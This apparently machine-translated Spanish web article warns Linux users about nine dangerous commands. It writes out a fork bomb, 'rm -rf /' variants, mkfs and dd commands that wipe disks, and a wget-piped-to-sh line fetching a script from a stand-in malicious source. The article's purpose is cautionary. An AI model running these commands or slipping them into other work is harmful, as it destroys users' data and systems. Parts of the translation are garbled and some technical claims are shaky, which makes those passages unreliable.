es.hideout-lastation.com
Paraíso Para Los Diseñadores Y Desarrolladores


9 Comandos y códigos de Linux para tener cuidado con

Los comandos de shell / terminal de Linux son muy potentes y un simple comando podría llevar a que se elimine una carpeta, archivos o carpeta raíz, etc.

En algunos casos, Linux ni siquiera le pedirá confirmación, sino que ejecutará el comando de inmediato, lo que le hará perder información y datos valiosos almacenados en estos archivos y carpetas.

Es común que las personas publiquen contenido en la web recomendando nuevos usuarios de Linux para ejecutar estos comandos . Esto puede parecer una broma para alguien que ha publicado el contenido, pero no es risa para la persona del otro lado.

Hemos reunido algunos comandos de Linux que son bastante dañinos para su sistema y que lo ayudarán a evitarlos. Tenga en cuenta que, de hecho, son peligrosos e incluso pueden modificarse de diversas maneras para producir nuevos comandos que infligen más daño.

Una cosa importante a tener en cuenta es que algunos de estos comandos solo son peligrosos si están prefijados con sudo en Ubuntu . Mientras que en otras distribuciones de Linux, la mayoría de estos comandos dados serán peligrosos de ejecutar como raíz.

Eche un vistazo a los 9 comandos y códigos que debe evitar ejecutar.

1. Comando Linux Fork Fork

:(){ :|: & };: también conocido como Fork Bomb es un ataque de denegación de servicio contra un sistema Linux. :(){ :|: & };: es una función bash. Una vez ejecutado, se repite varias veces hasta que el sistema se congela .

Solo puede deshacerse de él reiniciando su sistema. Así que tenga cuidado al ejecutar este comando en su shell de Linux.

2. carpeta mv / dev / null Command

mv folder/dev/null es otro comando arriesgado. Dev/null o null device es un archivo de dispositivo que descarta todos los datos escritos pero informa que la operación de escritura se ejecuta con éxito . También se lo conoce como bit bucked o black hole .

3. comando rm -rf

rm -rf comando rm -rf es una forma rápida de eliminar una carpeta y su contenido en el sistema operativo Linux. Si no sabe cómo usarlo correctamente, puede volverse muy peligroso para el sistema. Las combinaciones y opciones más comunes utilizadas con el comando rm-rf se enumeran a continuación:

  • rm comando rm se usa para eliminar los archivos en el sistema Linux.
  • rm -f comando rm -f elimina los archivos de solo lectura en la carpeta sin preguntar.
  • rm -r comando elimina el contenido de una carpeta recursivamente.
  • rm -d comando rm -d se usa para eliminar un directorio vacío pero rechazará eliminar el directorio si no está vacío.
  • rm -rf/ command se usa para eliminación forzada (lo elimina incluso si está protegido contra escritura) de todo el contenido en el directorio raíz y las subcarpetas.
  • rm -rf* comando rm -rf* se usa para borrar forzosamente todo el contenido del directorio actual (el directorio en el que está trabajando actualmente) y las subcarpetas.
  • rm -rf. comando se utiliza para la eliminación forzada de todo el contenido en la carpeta actual y las subcarpetas. El rm -r.[^.]* También se puede usar.
  • rm -i comando rm -i se usa para eliminar archivos y carpetas, pero aparecerá un mensaje antes de eliminarlo.

4. comando de mkfs

mkfs puede ser un comando peligroso para su sistema basado en Linux si no conoce su propósito. Cualquier cosa escrita después de los mkfs será formateada y reemplazada por un sistema de archivos Linux vacío .

Todos los comandos mencionados a continuación formatearán el disco duro y requieren derechos de administrador:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

El comando mkfs.cramfs hará lo mismo que el anterior pero no requiere derechos de administrador para ejecutarse.

5. Bomba Tar

El comando tar se usa para combinar múltiples archivos en un solo archivo (archivo archivado) en formato .tar . Se puede crear una bomba Tape Archive (Tar) con este comando.

Es un archivo de almacenamiento que explota en miles o millones de archivos con nombres similares a los archivos existentes en el directorio actual en lugar de hacerlo en un nuevo directorio cuando se desmarca.

Puede evitar convertirse en víctima de una bomba de alquitrán creando regularmente un nuevo directorio de protección cada vez que reciba un archivo tar y luego mueva el archivo tar recibido a este directorio antes de anular la marcación.

Si el archivo tar es de hecho una bomba alquitranada, simplemente puedes eliminar el directorio recién creado para deshacerte de él. Otra forma de evitar la explosión de una bomba de alquitrán es a través de la opción -t para listar todo el contenido de un archivo tar para darle una idea del tipo de contenido contenido en el archivo tar.

6. dd comando

El comando dd se usa para copiar y convertir particiones de disco duro . Sin embargo, puede resultar perjudicial si especifica un destino incorrecto.

El comando puede ser cualquiera de estos:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

El siguiente comando pondrá a cero todo el disco duro primario: dd if=/dev/zero of=/dev/had

7. Código de script de shell

Alguien puede victimizarlo dándole el enlace a un guión de shell y endosando que lo descargue y lo ejecute . La secuencia de comandos puede contener algún código malicioso o peligroso dentro. El formato del comando puede verse así: wget http://some_malicious_source -O- | sh wget http://some_malicious_source -O- | sh . El wget descargará el script mientras sh descarga la ejecución del script.

8. Código fuente malicioso

Alguien te da el código fuente y te pide que compiles. El código puede parecer un código normal, pero de hecho, algunos códigos maliciosos se ocultan en el código fuente grande y pueden dañar el sistema. Para evitar ser víctima de este tipo de ataque, solo acepte y compile su código fuente de fuentes confiables .

9. Bomba de descompresión

Ha recibido un archivo comprimido y se le pide que extraiga este archivo, que parece ser de un tamaño muy pequeño, pero puede tener algunos KB. De hecho, este archivo comprimido de pequeño tamaño contiene datos muy comprimidos .

Una vez que el archivo se descomprime, se extraen cientos de GB de datos que pueden llenar su disco duro para reducir el rendimiento de su sistema. Para evitar esta situación, recuerde siempre aceptar datos de fuentes confiables.

Más de 20 fuentes impresionantes de tiza para descargar

Más de 20 fuentes impresionantes de tiza para descargar

Piense en tiza y probablemente no piense en ella como una fuente que elegiría usar en el diseño web. Pero es posible que se sorprenda de lo atractiva que puede ser la tiza. Solo con verlo te devuelve la sensación nostálgica de la tarea y tienes que resolver problemas matemáticos en la pizarra con todos esos ojos en la parte posterior de tu cabeza. Eso

(Consejos de tecnología y diseño)

30 hermosos templos en Asia que debes visitar

30 hermosos templos en Asia que debes visitar

¿Está buscando destinos exóticos en el mundo que se ajusten a sus planes de viaje este año? El mundo es un lugar hermoso y hay muchos sitios para ver. Pero si quieres hacer las cosas un poco diferente, ¿qué tal visitar los templos exóticos que se encuentran en toda Asia?En esta colección, he reunido 30 de los templos más bellos del mundo para que los agregue a su lista de destinos imperdibles para sus próximos planes de viaje. No impor

(Consejos de tecnología y diseño)